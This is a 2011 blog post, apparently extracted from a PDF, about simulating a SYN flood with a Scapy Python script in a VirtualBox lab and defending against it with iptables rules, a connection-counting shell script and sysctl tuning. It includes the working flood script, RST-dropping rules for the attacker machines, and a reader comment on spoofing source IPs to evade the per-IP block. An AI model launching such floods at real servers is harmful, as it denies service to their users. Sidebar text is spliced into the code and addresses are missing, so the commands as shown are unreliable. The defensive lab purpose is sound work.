S a t u r d a y, M a y 1 4 , 2 0 1 1

Subodh Pachghare
SYN Packet Generation by Scapy & SYN Flood Prevention using iptables
iptables I am Performance fanatic & eat
Packets for breakfast. Enough
Recently I played with iptables & got into situation to prevent SYN Floods using iptables. So here is my said...
solution for this. SYN Flood Packet generation is done by Scapy to simulate the DDOS through Multiple View my complete profile
Oracle VirtualBox Virtual machines running Ubuntu 10.04 server. Works for me. :)

Attackers Configurations :

I am using three Virtual machines here of Ubuntu Server 10.04 connected through “Hostonly” network
adapter of VirtualBox. is Target server, & are Attackers.
Install the Scapy tool for packet generation, I am using 2.2.0 version here. Extract the Scapy source & run
the following command
root@ubiserv:~# python install

run Scapy using

For attacking the Target server at, insert the following rule into the Attacker’s systems i.e.
root@ubiserv:~# iptables –A OUTPUT –p tcp –s --tcp-flags RST RST –j DROP
root@ubiserv:~# iptables –A OUTPUT –p tcp –s --tcp-flags RST RST –j DROP

Note - Iptables rules will only apply to kernel stack, not above that. For ex. the iptables rule will not apply
to packets generated by Scapy. Scapy packet crafting tool creates the whole packet in its space, hence
iptables rule will not hold here. Though the malformed/manipulated packets crafted by Scapy will be seen
by Kernel, resulting in replies/responses/resets from Kernel. This can be prevented by using iptables, so
that kernel will not respond to scapy packets. After sending the SYN packets to Target the Attacker’s Kernel
This rule will DROP the packets from on OUTPUT chain with RST flag set, preventing
from resetting the connection.
script contents
#! /usr/bin/env python
# CyberSpace Name : HaX0R (Cyberninja) ► June 2011 (1)
# Website :
# Description : SYN Flood Packet creation for iptables prevention solution

import sys

from scapy.all import * Scapy & SYN Flood
#conf.verb=0 Prevent...
print "Field Values of packet sent" FreeRadius Server
p=IP(dst=sys.argv[1],id=1111,ttl=99)/TCP(sport=RandShort(),dport= Configuration for
Enterasys mana...
[22,80],seq=12345,ack=1000,window=1000,flags="S")/"HaX0r SVP"
ls(p) Linux iptables (Best Kernel
Firewall ever!) config...
print "Sending Packets in 0.3 second intervals for timeout of 4 sec"
ans,unans=srloop(p,inter=0.3,retry=2,timeout=4) ► April 2011 (4)
print "Summary of answered & unanswered packets"
unans.summary() ► February 2011 (2)
#for s,r in ans:
# print r.sprintf(" \t %TCP.flags%")
ans.make_table(lambda(s,r): (s.dst, s.dport, r.sprintf(" \t %IP.ttl% \t %TCP.flags%")))

SYN Flood python script can be downloaded here.

Usage of script will be like this weight virtualization to
root@ubiserv:~# python Hyper-Visor virtualization.

This script sends the SYN connections to the 22 & 80 port from random source port numbers
using randshort() function present. Script will also provide the detail of the crafted packet for the purpose
of attack. At last the script reports SA (SYN-ACK) responses & gives result in answered & unanswered
Kernel closes it. This is SYN Flood condition. The Million’s of unanswered SYN requests to Target can cause
the buffer to get filled up completely, unable to serve the legit clients as there is no memory resources left.
This is Typical DDOS (Distributed Denial of Service) attack initiated in real scenario from multiple IP
addresses across the globe. Retrospectively speaking, these kinds of attacks are generally carried out with
the help of BOTNETS or other compromised systems.
DDOS scenario. 25 attempts from every single IP address is allowed to take care of Packet loss, After that
SYN Packets from these IP will be rejected under intentional flooding case & IP address logged for tracking
time interval the script goes into sleep. For more IP connections observed it is recommended that to use Posts
lower seconds.
Use script like this
root@ubiserv:~# ./ 4
while true;
conntrack=`netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | grep $pip
cat /tmp/test1.txt | sort | uniq > /tmp/test2.txt
Iptables shell script can be downloaded here.
Further the SYN_ACK retries also has to be modified to the lower values, so that the SYN_RECV state
default value of 5 in Linux. 5 SYN_ACK retries will cause the older port connections to close in 3 minutes,
resulting in lots of stale connections & memory resource consumption. This can be reduce to 1 so that the
older SYN_RECV connections will close in 10 seconds if no reply is received from initiator. Set the parameter
using the following way.

Add the following line to /etc/sysctl.conf

net.ipv4.tcp_synack_retries = 1 Cisco/Enterasys

Commit the changes made in sysctl using

root@ubiserv:~# sysctl –p /etc/sysctl.conf

Verify it using
root@ubiserv:~# cat /proc/sys/net/ipv4/tcp_synack_retries EMC
1 Networker

Now the old connections will end in 10 sec as only one SYN_ACK retry sent. So this is it for SYN Flood
prevention. I will post more about iptables in later posts.Please drop me a mail if you think to use this & of High
course for any suggestions or problems. Mail can be found in Contact Me section. Happy rooting. Performance Computing

Click on the following images for Full Size.

Attack Scenario


Snapshot : Scapy python script output on Attackers system

Posted by Subodh Pachghare Recommend this on Google

Labels: Information Security, iptables, Kernel, Linux/Unix, network, Networking, Programming, python, scapy, shell script, SYN,
SYN Flood, tcp


Unknown September 26, 2013 at 12:17 AM

Good and lucid explanation !

My 2 cents - the preventive measure of blocking a particular IP when >25 SYN pkts come from it could be
easily bypassed by making SCAPY spoof the IP addresses ;)


Subodh Pachghare September 26, 2013 at 7:38 PM

Yeah you are absolutely right, attacker can easily spoof the IP address and can come back to launch SYN
packets, however new spoofed IP address will be banned too by prevention script. The idea here is to block
all connections who are intentionally trying to exhaust socket memory.


